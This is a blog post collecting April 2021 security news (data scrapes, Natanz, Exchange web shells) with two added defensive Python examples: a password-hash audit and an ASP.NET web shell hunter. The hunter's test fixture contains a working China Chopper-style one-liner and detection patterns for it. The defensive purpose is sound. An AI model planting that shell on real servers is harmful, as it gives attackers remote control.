This posting is here to collect cyber security news in April 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
260 Comments
Tomi Engdahl says:
Katie Canales / Insider:
Report: hackers scraped data of 500M LinkedIn users and posted it for sale online; LinkedIn confirms the dataset includes publicly viewable info from its site — Personal data from 500 million LinkedIn users has been scraped and is reportedly for sale on a hacking forum.
Hackers scraped data from 500 million LinkedIn users — about two-thirds of the platform’s userbase — and have posted it for sale online
https://www.businessinsider.com/linkedin-data-scraped-500-million-users-for-sale-online-2021-4?op=1&scrolla=5eb6d68b7fedc32c19ef33b4&r=US&IR=T
Tomi Engdahl says:
There’s Another Facebook Phone Number Database Online
https://www.vice.com/en/article/qj8dj5/facebook-phone-number-data-breach-telegram-bot
Analysis by Motherboard and a security researcher indicate the database is separate from the recently reported cache of 500 million accounts.
An online tool lets customers pay to unmask the phone numbers of Facebook users that liked a specific Page, and the underlying dataset appears to be separate from the 500 million account database that made headlines this week, signifying another data breach or large scale scraping of Facebook users’ data, Motherboard has found.
Tomi Engdahl says:
In #LinkedIn’s case, the data is way more personal and sensitive than it was in #Facebook’s case last week.
2 scraped LinkedIn databases with 500m and 827m records sold online
https://www.hackread.com/linkedin-scraped-databases-sold-online/
Although, none of the databases contain LinkedIn users’ passwords; the data in the records is enough for cybercriminals to carry out a number of attacks including SIM Swapping, identity scams, phishing, and SMSishing, etc.
Just last week, a hacker leaked over 533 million Facebook users’ data that was collected from the social media giant using the web data scraping technique. Now, two different threat actors are selling LinkedIn data compiled as a result of data scraping as well.
It is worth noting that both databases are being sold on the same hacker forum. One of the sellers is offering 7 LinkedIn databases which, when merged together, makes 827 million users’ records. The price for all databases together is
The database with 827 million records includes the following:
Job title
Full names
Company name
Company website
Email addresses
LinkedIn profile links
Job start date
City
State
Country
Zipcode
Addresses
Fax numbers
Phone numbers
Number of connections
Second LinkedIn database
According to a sample dataset shared by CyberNews, the LinkedIn profile owners’ data leaked in this data breach includes:
Usernames
Full names
Account IDs
Email addresses
Gender details
Phone numbers
Workplace information
Social media account links.
Tomi Engdahl says:
Texas Man Tried to Blow Up the Internet
Federal Investigators allege that a Texas man wanted to use C-4 to blow up around 70% of the internet.
https://www.vice.com/en/article/93y9q3/texas-man-tried-to-blow-up-the-internet?utm_source=vicenewsfacebook
FBI agents in Texas have arrested Seth Aaron Pendley for an alleged plot to blow up an Amazon data center in Virginia with the goal of taking down the internet.
“Mr. Pendley allegedly told the undercover he planned to attack web servers that he believed provided services to the FBI, CIA, and other federal agencies,” the DOJ said in a press release. “He said he hoped to bring down ‘the oligarchy’ currently in power in the United States.”
Pendley’s plan, if it had worked, would not have knocked out around 70% of the internet. “The AWS data places are almost all centrally located,” he said, according to the criminal complaint against him. “They are fucking MASSIVE. I haven’t got all the details worked out.”
An Illustrated Field Guide To Urban Internet Infrastructure, told VICE in 2019. “Whether it actually destroyed or erased any information seems pretty unlikely because there are enough data centers—and data is distributed enough and backed up enough—that in theory that probably would not be a major concern.”
Tomi Engdahl says:
Cisco has stated that it does not plan to patch three different small business router models and one VPN firewall device, despite critical vulnerabilities found in each. The SOHO router models contain a bug that is rated 9.8/10 in severity, and could allow unauthenticated remote users to attack targeted equipment and gain elevated privileges. The three Cisco router models have allegedly reached end of life and will not be fixed, according to a recent statement made by Cisco.
https://www.oodaloop.com/briefs/2021/04/09/zero-day-bug-impacts-problem-plagued-cisco-soho-routers/
Tomi Engdahl says:
Here’s how to tell if your Facebook account was one of the half billion that were breached
https://6abc.com/facebook-breach-2021-check-data-leak-have-i-been-pwned/10495474/
Tomi Engdahl says:
https://www.techspot.com/news/89173-amd-admits-zen-3-cpus-vulnerable-new-spectre.html
Tomi Engdahl says:
Clubhouse data leak: 1.3 million user records leaked online for free
https://cybernews.com/security/clubhouse-data-leak-1-3-million-user-records-leaked-for-free-online/
So far, it seems like it’s been the worst week of the year for social media platforms in terms of data leaks, with Clubhouse seemingly joining the fray.
Days after scraped data from more than a billion Facebook and LinkedIn profiles, collectively speaking, was put up for sale online, it looks like now it’s Clubhouse’s turn. The upstart platform seems to have experienced the same fate, with an SQL database containing 1.3 million Clubhouse user records leaked for free on a popular hacker forum.
https://cybernews.com/personal-data-leak-check/
Tomi Engdahl says:
https://www.durhamradionews.com/archives/136517
Tomi Engdahl says:
https://arstechnica.com/information-technology/2021/04/no-password-required-mobile-carrier-exposes-data-for-millions-of-accounts/
Tomi Engdahl says:
https://www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/facebookin-vuonna-2019-varastettuja-tietoja-julkaistu-mukana-12-miljoonan-suomalaisen
Tomi Engdahl says:
A nuclear facility in Iran was hit by a “terrorist act” a day after it unveiled new advanced uranium centrifuges, a top nuclear official says. He did not say who was to blame but urged the international community to deal with nuclear terrorism. Israeli media suggest the incident was a result of an Israeli cyber attack. Last year, a fire broke out at the Natanz underground facility, which the authorities alleged was the result of cyber sabotage.
The latest incident comes as diplomatic efforts to revive a 2015 nuclear deal – abandoned by the US under the Trump administration in 2018 – have resumed.
On Saturday, Iran’s President Hassan Rouhani inaugurated new centrifuges at the Natanz site, which is key to the country’s uranium enrichment programme, in a ceremony broadcast live on television.
Iran nuclear: ‘Terrorist act’ at underground Natanz facility
https://www.bbc.com/news/world-middle-east-56708778
Mr Kamalvandi did not provide further details but told Iran’s Fars news agency there had been “no casualties or leaks”.
Later state TV read out a statement by AEOI head Ali Akbar Salehi, in which he described the incident as “sabotage” and “nuclear terrorism”.
Tomi Engdahl says:
Ellen Nakashima / Washington Post:
Sources: Biden admin to announce the nominations of ex-NSA deputy director Chris Inglis as first national cyber director and Jen Easterly as CISA head on Monday — The Biden administration plans on Monday to name a former senior National Security Agency official as the first national cyber director …
Biden administration plans to name former senior NSA officials to White House cyber position and head of CISA
https://www.washingtonpost.com/national-security/former-senior-nsa-officials-named-to-white-house-cyber-position-and-head-of-dhs-cyber-agency/2021/04/11/b9d408cc-9b2d-11eb-8005-bffc3a39f6d3_story.html
The Biden administration plans on Monday to name a former senior National Security Agency official as the first national cyber director and another former NSA official to head the Department of Homeland Security’s cybersecurity agency.
The nomination of former NSA deputy director John C. “Chris” Inglis ends months of speculation about whom the Biden administration would appoint to the White House position, and comes after bipartisan pressure from lawmakers to fill the job they created in legislation that passed in December.
The administration also plans to nominate Jen Easterly, a former NSA intelligence officer who helped stand up U.S. Cyber Command more than a decade ago, to head the Cybersecurity and Infrastructure Security Agency
Both nominees, who are highly regarded in cyber policy circles, are expected to face smooth confirmations.
The moves come as the administration is grappling with the response to two major cyber events — one a Russian cyberespionage campaign known as SolarWinds that compromised nine federal agencies and about 100 private companies, and the other a Chinese hack of Microsoft Exchange servers that hit the private sector.
Tomi Engdahl says:
CISA Releases Tool to Detect Microsoft 365 Compromise
https://www.securityweek.com/cisa-releases-tool-detect-microsoft-365-compromise
The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) has released a new tool to help with the detection of potential compromise within Microsoft Azure and Microsoft 365 environments.
Dubbed Aviary, the new tool is a dashboard that makes it easy to visualize and analyze output from Sparrow, the compromise detection tool that was released in December 2020.
Built by CISA to help with the detection of malicious activity related to SolarWinds compromise, Sparrow can be used by network defenders to hunt for potential malicious activity within Microsoft Azure Active Directory (AD), Microsoft 365 (M365), and Office 365 (O365) environments.
Aviary is a new dashboard that CISA and partners developed to help visualize and analyze outputs from its Sparrow detection tool released in December 2020. Sparrow helps network defenders detect possible compromised accounts and applications in Azure/Microsoft O365 environments.
https://github.com/cisagov/sparrow/releases
Tomi Engdahl says:
Iran Calls Natanz Atomic Site Blackout ‘Nuclear Terrorism’
https://www.securityweek.com/iran-calls-natanz-atomic-site-blackout-nuclear-terrorism
Iran on Sunday described a blackout at its underground Natanz atomic facility as an act of “nuclear terrorism,” raising regional tensions as world powers and Tehran continue to negotiate over its tattered nuclear deal.
While there was no immediate claim of responsibility, suspicion fell immediately on Israel, where its media nearly uniformly reported a devastating cyberattack orchestrated by the country caused the blackout.
If Israel was responsible, it further heightens tensions between the two nations, already engaged in a shadow conflict across the wider Middle East.
Details remained few about what happened early Sunday morning at the facility, which initially was described as a blackout caused by the electrical grid feeding its above-ground workshops and underground enrichment halls.
Ali Akbar Salehi, the American-educated head of the Atomic Energy Organization of Iran, who once served as the country’s foreign minister, offered what appeared to be the harshest comments of his long career, which included the assassination of nuclear scientists a decade ago. Iran blames Israel for those killings as well.
He pledged to “seriously improve” his nation’s nuclear technology while working to lift international sanctions.
The IAEA, the United Nations’ body that monitors Tehran’s atomic program, earlier said it was aware of media reports about the incident at Natanz and had spoken with Iranian officials about it. The agency did not elaborate.
However, Natanz has been targeted by sabotage in the past. The Stuxnet computer virus, discovered in 2010 and widely believed to be a joint U.S.-Israeli creation, once disrupted and destroyed Iranian centrifuges at Natanz amid an earlier period of Western fears about Tehran’s program.
Natanz suffered a mysterious explosion at its advanced centrifuge assembly plant in July that authorities later described as sabotage. Iran now is rebuilding that facility deep inside a nearby mountain.
“It’s hard for me to believe it’s a coincidence,” Yoel Guzansky, a senior fellow at Tel Aviv’s Institute for National Security Studies, said of Sunday’s blackout. “If it’s not a coincidence, and that’s a big if, someone is trying to send a message that ‘we can limit Iran’s advance and we have red lines.’”
It also sends a message that Iran’s most sensitive nuclear site is “penetrable,” he added.
Tomi Engdahl says:
Kyle Wiggers / VentureBeat:
Nvidia announces Morpheus, an AI-powered cloud-native app framework to help cybersecurity providers detect and prevent breaches in real-time, now in preview
Nvidia announces Morpheus, an AI-powered app framework for cybersecurity
https://venturebeat.com/2021/04/12/nvidia-announces-morpheus-an-ai-powered-app-framework-for-cybersecurity/
During its GTC 2021 virtual keynote this morning, Nvidia announced Morpheus, a “cloud-native” app framework aimed at providing cybersecurity partners with AI skills that can be used to detect and mitigate cybersecurity attacks. Using machine learning, Morpheus identifies, captures, and acts on threats and anomalies, including leaks of sensitive data, phishing attempts, and malware.
Morpheus is available in preview from today, and developers can apply for early access on Nvidia’s landing page.
Reflecting the pace of adoption, the AI in cybersecurity market will reach $38.2 billion in value by 2026, Markets and Markets projects. That’s up from $8.8 billion in 2019, representing a compound annual growth rate of around 23.3%. Just last week, a study from MIT Technology Review Insights and Darktrace found that 96% of execs at large enterprises are considering adopting “defensive AI” against cyberattacks.
Tomi Engdahl says:
Combined with the recent leak of half a billion phone numbers of FB users, this should be fun.
“A nasty new surprise for WhatsApp’s 2 billion users today, with the discovery of an alarming security risk. Using just your phone number, a remote attacker can easily deactivate WhatsApp on your phone and then stop you getting back in. Even two-factor authentication will not stop this. Here’s how the attack works…”
Sudden New Warning Will Surprise Millions Of WhatsApp Users
https://www.forbes.com/sites/zakdoffman/2021/04/10/shock-new-warning-for-millions-of-whatsapp-users-on-apple-iphone-and-google-android-phones/?sh=626604417585
This shouldn’t happen. It shouldn’t be possible. Not with a platform used by 2 billion people. Not this easily. When researchers, Luis Márquez Carpintero and Ernesto Canales Pereña, warned they could kill WhatsApp on my phone, blocking me from my own account using just my phone number, I was doubtful. But they were right.
“This is yet another worrying hack,” warns ESET’s Jake Moore, “one that could impact millions of users who could potentially be targeted with this attack. With so many people relying on WhatsApp as their primary communication tool for social and work purposes, it is alarming at what ease this can occur.”
Now, let’s start with the first weakness. Anyone can install WhatsApp on a phone and enter your number on the verification screen. You will then receive texts and calls from WhatsApp with the six-digit code. You will also see a WhatsApp app notification, telling you that a code has been requested, warning you not to share it.
So, to be very clear. WhatsApp has received an email referencing your phone number. They have no way of knowing whether this is really from you. There are no follow-up questions to confirm your ownership of the number. But an automated process has been triggered, without your knowledge, and your account will now be deactivated.
An hour or so later, and suddenly WhatsApp stops working on your phone and you see an alarming notification: “Your phone number is no longer registered with WhatsApp on this phone,” it says. “This might be because you registered it on another phone. If you didn’t do this, verify your phone number to log back into your account.” This deactivation appears to be automated, using keywords to trigger actions.
Clearly, the combination of this verification architecture, the SMS/code limits and the automated, keyword-based actions triggered by incoming emails is open to abuse. There is no sophistication to this attack—that’s the real issue here and WhatsApp should address it immediately. There are many reasons why it might be advantageous to block someone from their go-to messenger. It shouldn’t be this easy. And this should not work when 2FA is enabled, as was the case on this “victim’s” app.
According to Moore, this vulnerability has flagged another serious WhatsApp issue. “There is no way of opting out of being discovered on WhatsApp,” he warns. “Anyone can type in a phone number to locate the associated account if it exists. Ideally, a move towards being more privacy focused would help protect users from this, as well as forcing people to implement a two-step verification PIN.”
Tomi Engdahl says:
Sudden New Warning Will Surprise Millions Of WhatsApp Users
https://archive.ph/KjCb2
Tomi Engdahl says:
The bomb dot com
FBI arrest Texas man for attempting to blow up ‘the internet’ with C-4
By Katie Wickens
https://www.pcgamer.com/man-tries-to-blow-up-internet/
He believed the single data center he was targeting contained “about 70 percent of the internet.”
Seth Aaron Pendley of Texas appeared in court this weekend after being apprehended by the FBI for conspiring to blow up the internet. *Checks notes* no, that is what it says. The idea was to take down an Amazon Web Services (AWS) data centre in order to free the USA from “the oligarchy” that he believes to be currently controlling his beloved country.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/joker-malware-infects-over-500-000-huawei-android-devices/
Tomi Engdahl says:
Israel appears to confirm it carried out cyberattack on Iran nuclear facility
https://www.theguardian.com/world/2021/apr/11/israel-appears-confirm-cyberattack-iran-nuclear-facility
Israel appeared to confirm claims that it was behind a cyber-attack on Iran’s main nuclear facility on Sunday, which Tehran’s nuclear energy chief described as an act of terrorism that warranted a response against its perpetrators.
Tomi Engdahl says:
The Inner Finland Police Department is investigating several hijackings of the WhatsApp application
https://poliisi.fi/-/sisa-suomen-poliisilaitoksella-on-tutkittavana-useita-whatsapp-sovelluksen-kaappauksia
Several people have reported cases to the police in which their own WhatsApp account has been hijacked. According to the investigations, the WhatsApp account is hijacked by having a familiar contact ask the victim to urgently forward a 6-digit code that is sent to the victim’s phone.
Tomi Engdahl says:
Dutch supermarkets run out of cheese after ransomware attack
https://www.bleepingcomputer.com/news/security/dutch-supermarkets-run-out-of-cheese-after-ransomware-attack/
A ransomware attack against conditioned warehousing and transportation provider Bakker Logistiek has caused a cheese shortage in Dutch supermarkets.
Tomi Engdahl says:
Updates on Microsoft Exchange Server Vulnerabilities
https://us-cert.cisa.gov/ncas/current-activity/2021/04/12/updates-microsoft-exchange-server-vulnerabilities
CISA has added two new Malware Analysis Reports (MARs) to Alert AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities.
Tomi Engdahl says:
IcedID Circulates Via Web Forms, Google URLs
https://threatpost.com/icedid-web-forms-google-urls/165347/
Attackers are filling out and submitting web-based contact us forms, thus evading email spam filters.
Tomi Engdahl says:
Pulse Secure VPN users can’t login due to expired certificate
https://www.bleepingcomputer.com/news/security/pulse-secure-vpn-users-cant-login-due-to-expired-certificate/
Users worldwide cannot connect to Pulse Secure VPN devices after a code signing certificate used to digitally sign and verify software components has expired.
Tomi Engdahl says:
Critical security alert: If you haven’t patched this old VPN vulnerability, assume your network is compromised
https://www.zdnet.com/article/critical-security-alert-if-you-havent-patched-this-two-year-old-vpn-vulnerability-assume-your-network-is-compromised/
Hundreds of organisations that haven’t applied a Fortinet VPN security update released in 2019 should assume that cyber criminals are trying to take advantage, NCSC warns.
Tomi Engdahl says:
Brian Krebs / Krebs on Security:
Data of 21M ParkMobile customers, including emails and license plate numbers, is up for sale; ParkMobile had disclosed a cybersecurity incident on March 26 — Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app that’s popular in North America.
ParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users
https://krebsonsecurity.com/2021/04/parkmobile-breach-exposes-license-plate-data-mobile-numbers-of-21m-users/
Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app that’s popular in North America. The stolen data includes customer email addresses, dates of birth, phone numbers, license plate numbers, hashed passwords and mailing addresses.
Asked about the sales thread, Atlanta-based ParkMobile said the company published a notification on Mar. 26 about “a cybersecurity incident linked to a vulnerability in a third-party software that we use.”
“In response, we immediately launched an investigation with the assistance of a leading cybersecurity firm to address the incident,” the notice reads. “Out of an abundance of caution, we have also notified the appropriate law enforcement authorities. The investigation is ongoing, and we are limited in the details we can provide at this time.”
The statement continues: “Our investigation indicates that no sensitive data or Payment Card Information, which we encrypt, was affected. Meanwhile, we have taken additional precautionary steps since learning of the incident, including eliminating the third-party vulnerability, maintaining our security, and continuing to monitor our systems.”
Asked for clarification on what the attackers did access, ParkMobile confirmed it included basic account information – license plate numbers, and if provided, email addresses and/or phone numbers, and vehicle nickname.
“In a small percentage of cases, there may be mailing addresses,”
ParkMobile doesn’t store user passwords, but rather it stores the output of a fairly robust one-way password hashing algorithm called bcrypt, which is far more resource-intensive and expensive to crack than common alternatives like MD5. The database stolen from ParkMobile and put up for sale includes each user’s bcrypt hash.
“You are correct that bcrypt hashed and salted passwords were obtained,” Perkins said when asked about the screenshot in the database sales thread.
“Note, we do not keep the salt values in our system,”
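As an added illustration (not code from the Krebs article or from ParkMobile), the audit below parses the bcrypt modular-crypt string format to show that the cost factor and salt travel inside each stored hash, and flags stored hashes that are unsalted MD5 or use a low bcrypt cost. The sample hashes, the labels and the policy minimum are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, Optional

# bcrypt stores everything a verifier needs in one string:
#   $2<variant>$<cost>$<22-char salt><31-char hash>
# so any dump of bcrypt hashes necessarily carries the salts with it.
BCRYPT_RE = re.compile(
    r"^\$2([abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)
# 32 hex characters: the shape of a raw, unsalted MD5 digest.
MD5_HEX_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)

# Hypothetical policy threshold for this example; pick your own.
MIN_ACCEPTABLE_COST = 10


@dataclass
class HashInfo:
    scheme: str
    cost: Optional[int]        # bcrypt log2 work factor, if present
    salt: Optional[str]        # salt as embedded in the stored string
    iterations: Optional[int]  # key-setup rounds = 2 ** cost for bcrypt
    finding: str


def inspect_hash(stored: str) -> HashInfo:
    """Classify one stored password hash and report what an auditor should know."""
    m = BCRYPT_RE.match(stored)
    if m:
        cost = int(m.group(2))
        iterations = 2 ** cost
        if cost < MIN_ACCEPTABLE_COST:
            finding = f"bcrypt cost {cost} is below policy minimum {MIN_ACCEPTABLE_COST}"
        else:
            finding = "ok"
        return HashInfo("bcrypt", cost, m.group(3), iterations, finding)
    if MD5_HEX_RE.match(stored):
        # One pass, no salt: identical passwords collide and precomputation works.
        return HashInfo("md5", None, None, 1, "unsalted fast hash; replace with bcrypt")
    return HashInfo("unknown", None, None, None, "unrecognised format; investigate")


def audit(stored_hashes: Dict[str, str]) -> Dict[str, str]:
    """Map each record label to its audit finding."""
    return {label: inspect_hash(value).finding for label, value in stored_hashes.items()}


# Constructed, format-valid sample strings. They are NOT hashes of any real
# password; only the layout matters for the parser.
SAMPLE_HASHES = {
    "user_strong": "$2b$12$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234",
    "user_weak_cost": "$2a$04$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234",
    "user_legacy_md5": "0123456789abcdef0123456789abcdef",
    "user_garbage": "not-a-hash",
}

if __name__ == "__main__":
    for label, value in SAMPLE_HASHES.items():
        info = inspect_hash(value)
        print(f"{label:16} {info.scheme:8} cost={info.cost} salt={info.salt} "
              f"rounds={info.iterations} -> {info.finding}")
```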
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/google-chrome-microsoft-edge-zero-day-vulnerability-shared-on-twitter/
Tomi Engdahl says:
Released: April 2021 Exchange Server Security Updates
https://techcommunity.microsoft.com/t5/exchange-team-blog/released-april-2021-exchange-server-security-updates/ba-p/2254617
Vulnerabilities addressed in the April 2021 security updates were responsibly reported to Microsoft by a security partner. Although we are not aware of any active exploits in the wild, our recommendation is to install these updates immediately to protect your environment.
Tomi Engdahl says:
RCE Exploit Released for Unpatched Chrome, Opera, and Brave Browsers
https://thehackernews.com/2021/04/rce-exploit-released-for-unpatched.html
An Indian security researcher has publicly published a proof-of-concept (PoC) exploit code for a newly discovered flaw impacting Google Chrome and other Chromium-based browsers like Microsoft Edge, Opera, and Brave. While Google has addressed the issue in the latest version of V8, it’s yet to make its way to the stable channel, thereby leaving the browsers vulnerable to attacks.
Tomi Engdahl says:
Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild
https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/
While analyzing the CVE-2021-1732 exploit originally discovered by the DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we discovered another zero-day exploit we believe is linked to the same actor.
Tomi Engdahl says:
CS:GO, Valve Source games vulnerable to hacking using Steam invites
https://www.bleepingcomputer.com/news/security/cs-go-valve-source-games-vulnerable-to-hacking-using-steam-invites/
A group of security researchers known as the Secret Club took to Twitter to report a remote code execution bug in the Source 3D game engine developed by Valve and used for building games with tens of millions of unique players.
Tomi Engdahl says:
FBI Agents Secretly Deleted Web Shells From Hacked Microsoft Exchange Servers
https://www.securityweek.com/fbi-agents-secretly-deleted-web-shells-hacked-microsoft-exchange-servers
FBI agents executed a court-authorized cyber operation to delete malicious web shells from hundreds of previously hacked Microsoft Exchange servers in the United States, unbeknownst to their owners, the U.S. Department of Justice (DoJ) said Tuesday.
After a wave of major in-the-wild zero-day attacks against Exchange Server installations that occurred globally in January, savvy organizations scrambled to lock down vulnerable Microsoft email servers and remove web shells that were installed by attackers.
In early attacks observed by Microsoft, attackers were able to exploit a series of vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.
Unfortunately, many organizations were not able to patch systems and/or remove associated malware that was installed.
In what appears to be the first known operation of its kind, the FBI “removed one early hacking group’s remaining web shells which could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.”
According to court documents, FBI agents removed the web shells by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path).
“Because the web shells the FBI removed each had a unique file path and name, they may have been more challenging for individual server owners to detect and eliminate than other web shells,” the DoJ explained.
Tomi Engdahl says:
MS Patch Tuesday: NSA Reports New Critical Exchange Flaws
https://www.securityweek.com/ms-patch-tuesday-nsa-reports-new-critical-exchange-flaws
Just weeks after a wave of major in-the-wild zero-day attacks against Exchange Server installations globally, Microsoft is raising a fresh alarm for four new critical security flaws that expose businesses to remote code execution attacks.
The four new Exchange Server vulnerabilities were fixed as part of this month’s Patch Tuesday bundle and because of the severity of these issues, Microsoft has joined with the U.S. National Security Agency (NSA) to urge the immediate deployment of the new fixes.
The NSA is credited with reporting two of the four Exchange Vulnerabilities — CVE-2021-28480 and CVE-2021-28481 – and the agency is warning that exploitation “could allow persistent access and control of enterprise networks.”
The two NSA-discovered bugs carry a CVSS score of 9.8 because of the risk of pre-auth code execution attacks without user interaction. TippingPoint’s ZDI believes these bugs may be wormable between Exchange servers.
“Considering the source, and considering these bugs also receive Microsoft’s highest Exploit Index rating, assume they will eventually be exploited. Update your systems as soon as possible,” ZDI added.
Tomi Engdahl says:
PoC Exploit Released for Unpatched Flaw Affecting Chromium-Based Browsers
https://www.securityweek.com/poc-exploit-released-unpatched-flaw-affecting-chromium-based-browsers
Google Patches More Under-Attack Chrome Zero-days
https://www.securityweek.com/google-patches-more-under-attack-chome-zero-days
Tomi Engdahl says:
https://www.securityweek.com/swedish-sports-body-hacked-russians-officials-say
Tomi Engdahl says:
FBI nuked web shells from hacked Exchange Servers without telling owners
https://www.bleepingcomputer.com/news/security/fbi-nuked-web-shells-from-hacked-exchange-servers-without-telling-owners/
A court-approved FBI operation was conducted to remove web shells from compromised US-based Microsoft Exchange servers without first notifying the servers’ owners.
On March 2nd, Microsoft released a series of Microsoft Exchange security updates for vulnerabilities actively exploited by a hacking group known as HAFNIUM.
These vulnerabilities are collectively known as ProxyLogon and were used by threat actors in January and February to install web shells on compromised Exchange servers. These web shells provided remote access to the servers where threat actors used them to exfiltrate email and account credentials.
Over the following weeks, government agencies released guidance, and Microsoft released a variety of scripts and tools to help victims determine if they had been compromised and remove web shells.
Simultaneously, other threat actors began using the Microsoft Exchange vulnerabilities to install ransomware, cryptominers, and further web shells.
FBI uses search warrant to remove web shells
In a Department of Justice press release published today, the FBI states they used a search warrant to access the still-compromised Exchange servers, copy the web shell as evidence, and then remove the web shell from the server.
The FBI requested this warrant because they believed that the owners of the still-compromised web servers did not have the technical ability to remove them on their own and that the shells posed a significant risk to the victim.
Tomi Engdahl says:
The FBI is remotely hacking hundreds of computers to protect them from Hafnium
They went inside unprotected computers to remove the threat
https://www.theverge.com/2021/4/13/22382821/fbi-doj-hafnium-remote-access-removal-hack
In what’s believed to be an unprecedented move, the FBI is trying to protect hundreds of computers infected by the Hafnium hack by hacking them itself, using the original hackers’ own tools (via TechCrunch).
The hack, which affected tens of thousands of Microsoft Exchange Server customers around the world and triggered a “whole of government response” from the White House, reportedly left a number of backdoors that could let any number of hackers right into those systems again. Now, the FBI has taken advantage of this by using those same web shells / backdoors to remotely delete themselves, an operation that the agency is calling a success.
“The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” explains the US Justice Department.
It’ll be interesting to see if this sets a precedent for future responses to major hacks like Hafnium. While I’m personally undecided, it’s easy to argue that the FBI is doing the world a service by removing a threat like this — while Microsoft may have been painfully slow with its initial response, Microsoft Exchange Server customers have also now had well over a month to patch their own servers after several critical alerts. I wonder how many customers will be angry, and how many grateful that the FBI, not some other hacker, took advantage of the open door. We know that critical-but-local government infrastructure often has egregious security practices, most recently resulting in two local drinking water supplies being tampered with.
The FBI says that thousands of systems were patched by their owners before it began its remote Hafnium backdoor removal operation, and that it only “removed one early hacking group’s remaining web shells which could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.”
“Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” reads a statement from Assistant Attorney General John C. Demers, with the Justice Department’s National Security Division.
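The two comments above describe the same operation from two angles: the web shells were identified by their file paths, and Microsoft had already published scripts for finding them. Below is an added example, not Microsoft's own tooling and not the FBI's removal command, of the kind of hunt a defender would run on an Exchange box before deciding anything about removal. It walks a web root, scores every .aspx/.asmx/.ashx file by two heuristics, location in a directory Microsoft's HAFNIUM write-up named as a drop point and source patterns typical of one-line ASP.NET shells, and returns the files over a threshold. The pattern weights, the threshold and the fixture files are this example's own assumptions; the fixture is constructed test data, not material from any real incident.

```python
"""Hunt for ASP.NET web shells under an Exchange web root.

Added example (not Microsoft's or the FBI's code). Scores files by
location and by source patterns; the weights are this example's choices.
"""
import re
import tempfile
from pathlib import Path

# Directories Microsoft's HAFNIUM write-up named as web shell drop points,
# matched as a suffix of the file's parent directory so any drive letter or
# Exchange install root works.
KNOWN_DROP_DIRS = (
    "inetpub/wwwroot/aspnet_client",
    "inetpub/wwwroot/aspnet_client/system_web",
    "FrontEnd/HttpProxy/owa/auth",
    "FrontEnd/HttpProxy/ecp/auth",
)

# Weighted source patterns. A legitimate OWA page scores nothing here; a
# China Chopper style one-liner (eval of a request parameter) scores high.
SUSPICIOUS_PATTERNS = (
    (re.compile(r'eval\s*\(\s*Request', re.I), 3, "eval() of request input"),
    (re.compile(r',\s*"unsafe"\s*\)', re.I), 2, 'JScript "unsafe" eval mode'),
    (re.compile(r'System\.Diagnostics\.Process', re.I), 2, "process spawning"),
    (re.compile(r'cmd\.exe', re.I), 2, "cmd.exe reference"),
    (re.compile(r'Assembly\.Load\s*\(', re.I), 2, "runtime assembly load"),
    (re.compile(r'Request\s*\[\s*"[^"]+"\s*\]', re.I), 1, "raw request item access"),
)
FLAG_THRESHOLD = 3   # assumed cut-off: drop dir alone is not enough to flag
KNOWN_DIR_WEIGHT = 2


def score_file(rel_path, content):
    """Return (score, reasons) for one file given its root-relative path and source."""
    score, reasons = 0, []
    parent = Path(rel_path).parent.as_posix()
    if any(parent == d or parent.endswith("/" + d) for d in KNOWN_DROP_DIRS):
        score += KNOWN_DIR_WEIGHT
        reasons.append(f"located in known drop directory {parent}")
    for pattern, weight, label in SUSPICIOUS_PATTERNS:
        if pattern.search(content):
            score += weight
            reasons.append(label)
    return score, reasons


def scan_tree(root):
    """Walk root, score every ASP.NET handler file, return flagged findings sorted by path."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.suffix.lower() not in (".aspx", ".asmx", ".ashx"):
            continue
        rel = path.relative_to(root).as_posix()
        try:
            content = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the hunt
        score, reasons = score_file(rel, content)
        if score >= FLAG_THRESHOLD:
            findings.append({"path": rel, "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: f["path"])


# Constructed fixture: a Chopper-style shell in a known drop directory, a
# benign OWA page in a known drop directory, and an ordinary app page that
# reads Request[] once. None of these are files from a real incident.
FIXTURE_FILES = {
    "inetpub/wwwroot/aspnet_client/system_web/help.aspx":
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["orange"],"unsafe");}</script>',
    "FrontEnd/HttpProxy/owa/auth/logon.aspx":
        '<%@ Page Language="C#" %><html><body>Outlook Web App sign-in</body></html>',
    "inetpub/wwwroot/app/orders.aspx":
        '<%@ Page Language="C#" %><% var id = Request["id"]; %><p>Order <%= id %></p>',
}


def build_fixture():
    """Write the constructed fixture into a temp directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="exchange_hunt_"))
    for rel, body in FIXTURE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    for f in scan_tree(build_fixture()):
        print(f"{f['score']:>2}  {f['path']}  ({', '.join(f['reasons'])})")
```

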